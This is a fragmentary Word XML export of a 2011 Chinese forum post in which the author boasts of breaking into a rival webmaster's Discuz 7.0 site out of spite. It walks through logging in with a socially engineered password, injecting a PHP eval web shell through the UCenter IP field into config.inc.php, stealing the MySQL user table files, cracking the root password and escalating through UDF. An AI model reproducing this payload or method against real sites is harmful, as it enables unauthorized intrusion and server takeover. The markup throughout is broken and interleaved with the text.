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t>图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/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文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作者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小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鸡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本文出了不准对任何站长，只是说明，没任何站点是安全的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前几天被一个大黑阔站没事骂了一句，然后说，我的站你能日的下吗？还带了一句，我的站都没人日的下，这下好，悲剧了，我也不知道说啥了，就默默跑去看了。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一开始一个朋友貌似射到他一些资料了，不过资料让我很奇怪。其实就误导了我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4810125" cy="3676650"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="15" name="aimg_96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60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t>当时我觉得悲剧了，这样的资料算神马社工哇。。</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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后来就不管了。自己跑去社了一天多，也只有一点点消息，不知道从哪冒出一个密码，特别悲剧，社的资料里，有个密码。可能是朋友社的，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3076575" cy="1209675"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="aimg_96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61" descr="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t>这密码好经典，不知道咋说好，是管理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2B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还是啥的。直接登陆，居然进去了。！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~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！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@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t>这后果严重了，连支持宝密码都一样。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t>进了他的后台，。是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DZ 7.0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的，百度多的是办法。随便找个方法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Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.Ucenter IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>插入一句话：</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hake\\');eval($_POST[hake])?&gt;;//  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Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>然后返回刚才插入地方，随便替换几个字母</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>连接文件是根目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>config.inc.php</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="005800EE">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://localhost/dz/config.inc.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>成功插入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关于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DZ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后台拿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SHELL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的方法。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这是关于</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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7.0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至</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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7.3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的方法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然后果断连接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SHELL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5715000" cy="3009900"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="aimg_96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62" descr="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t>拿到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SHELL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。这下他很悲剧，反正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SHELL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对我们没啥重要，拿服务器。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t>查看了一下配置文件，不是</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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ROOT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。只能去找，权限大的去了。悲剧。翻完所有目录。找到</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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ROOT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，果断下载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DATA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目录的文件，获取密码。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t>这三个文件，，然后就可以获取的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ROOT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加密文了，之后我们自己去解文明，至于人品，这就得看你自己了！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user.MYD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user.MYI user.frm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5715000" cy="2066925"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="aimg_96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63" descr="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t>人品太好，解除来了。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123xxx123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密码。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Root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用户，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t>提权去，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UDF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t>上传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UDF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。然后输入账号密码，提权的时候居然提示了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5715000" cy="1276350"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="aimg_96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64" descr="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t>悲剧，无法导入？？？啥情况？</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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回头检查了一下，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t>这有个详细方法。我们继续说我们下面的内容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PS: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10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="005800EE">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.hake.cc/forum.php?mod=viewthread&amp;tid=4797&amp;extra=page%3D2</w:t>
        </w:r>
      </w:hyperlink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t>这有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MYSQL 5.1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提权方式。大家去看看吧。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t>用大马去连接才知道是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MYSQL 5.1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的。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MYSQL5.0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与</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5.1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提权方法是不一样的。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宋体" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1028700"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="aimg_96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65" descr="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t>需要写入DATA目录。至于什么问题，这就得具体情况处理了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005800EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800E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宋体" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4086225" cy="2628900"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="21" name="aimg_96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66" descr="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0EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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t>利用命令建立了一个目录</w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> 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t>。。。然后进行提权看看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005800EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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t>果断提权成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005800EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman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715000" cy="2533650"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="aimg_96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67" descr="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0EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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t>至于你们想干嘛，我看你们知道的。。必须，黑阔都说过没人能格我盘，但我没那么贱。至于你觉得你牛B，我没话可说。果断服务器图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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3914775" cy="4200525"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="23" name="aimg_968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68" descr="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00EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005800EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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t>大家别笑，我不想日他。但他做人很贱，很让人觉得恶心。还来一句，都没人能日我的站。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005800EE" w:rsidRPr="005800EE" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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t>做人不能这么悲剧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E5A7A" w:rsidRDefault="005800EE" w:rsidP="005800EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005800EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>好了。文章到这，果断挂首页，提醒黑客大站长，你的牛B站果断被日</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E5A7A" w:rsidSect="006E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6980"/>
    <w:rsid w:val="004C6980"/>
    <w:rsid w:val="005800EE"/>
    <w:rsid w:val="006E5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A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0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800EE"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005800E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800E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800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3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3853">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="5" w:color="CDCDCD"/>
                <w:left w:val="single" w:sz="6" w:space="6" w:color="CDCDCD"/>
                <w:bottom w:val="single" w:sz="6" w:space="5" w:color="CDCDCD"/>
                <w:right w:val="single" w:sz="6" w:space="6" w:color="CDCDCD"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="7283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dz/config.inc.php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://www.hake.cc/forum.php?mod=viewthread&amp;tid=4797&amp;extra=page%3D2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2011-10-27T07:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-27T07:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>